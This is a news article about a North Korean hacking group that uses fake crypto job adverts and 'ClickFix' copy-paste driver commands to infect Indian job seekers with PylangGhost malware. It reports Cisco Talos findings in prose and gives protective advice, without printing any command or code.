Crypto Professionals in India Targeted by North Korean Hackers Using Fake Job Interviews and Malware

North Korean Hackers Target Indian Crypto Job Seekers With Malware

A lesser-known North Korean hacking group, Famous Chollima, has been aggressively targeting job applicants in India’s cryptocurrency and blockchain sector.

Unlike the notorious Lazarus Group, this faction employs crude but effective phishing tactics to trick candidates into installing malware on their computers.

The campaign, active since mid-2024, centres on fake job adverts and fraudulent skill tests designed to infect victims with malicious software called PylangGhost.

How Fake Job Offers Lead to Malware Infection

Famous Chollima operates by creating counterfeit recruitment websites impersonating well-known crypto companies such as Coinbase, Uniswap, and Robinhood.

The fake job listings lure professionals with experience in blockchain and crypto technologies to apply.

After filling out details and participating in supposed video interviews, applicants are prompted to copy and paste commands under the guise of installing video drivers.

The questions distributed by hackers were for an illegitimate Business Development Manager role, falsely presented as an opportunity at Robinhood. (Source: Cisco Talos)

Instead, these commands download malware that gives hackers full access to victims’ devices.

This malware targets sensitive information including login credentials, browser data, and cryptocurrency wallet extensions like MetaMask and Phantom.

For Windows users, the site presents instructions to copy, paste, and execute a malicious command disguised as a video driver installation, with a separate set of instructions also provided for macOS. (Source: Cisco Talos)

Cisco Talos researchers highlighted the use of a method called “ClickFix,” which exploits human problem-solving instincts by prompting users to fix fake error messages, ultimately executing harmful code.

How Does Famous Chollima Differ From Lazarus Group?

Though both groups originate from North Korea and operate within the crypto space, Famous Chollima’s approach is notably less sophisticated.

Cisco Talos noted the fake job adverts lack authentic branding and often include irrelevant questions, raising suspicion.

Example of the fake job adverts. (Source: Cisco Talos)

In contrast, Lazarus Group is known for highly coordinated and advanced cyberattacks, including large-scale crypto thefts.

BitMEX recently revealed that Lazarus employs a two-tier team system: a lower-skilled group to breach initial security and a higher-skilled team to carry out the thefts.

It’s possible North Korea’s cyber operations follow a similar structure across different groups, but Famous Chollima’s simpler tactics suggest early-stage or opportunistic efforts.

Are These Attacks a Prelude to Larger North Korean Crypto Schemes?

The true intention behind Famous Chollima’s campaign remains uncertain.

While the attacks may represent small-scale thefts, experts warn they could also serve as reconnaissance to better mimic legitimate job seekers or gain persistent access to crypto firms.

Past incidents reinforce this concern — in late 2024, Radiant Capital suffered a $50 million loss after North Korean hackers infected employees’ devices through malware disguised as a contractor’s report.

North Korean hackers have long targeted cryptocurrency professionals, especially those using Apple devices, which are popular in the industry.

The government reportedly benefits financially from citizens employed overseas and through crypto thefts enabled by such infiltrations.

What Should Crypto Job Seekers Do to Protect Themselves?

The ongoing campaign highlights the risks faced by job seekers in the rapidly growing crypto industry.

Experts recommend scrutinising recruitment portals carefully, avoiding running unfamiliar command lines, and employing strong security measures like multi-factor authentication and endpoint protection.

Monitoring browser extensions is crucial, as malware like PylangGhost actively targets crypto wallets and credential managers.

Is This Just the Beginning of a New Cyber Threat Era?

The rise of groups like Famous Chollima signals that North Korea’s cyber operations are diversifying beyond the Lazarus Group’s high-profile attacks.

While their methods may appear rudimentary, their focus on crypto professionals could pave the way for more sophisticated infiltration tactics in the future.

With job seekers unwittingly providing backdoors into blockchain firms, the line between recruitment and espionage is dangerously blurred.

The evolving threat demands vigilance not just from individuals, but from the industry at large, as attackers probe new vulnerabilities through the very workforce meant to build it.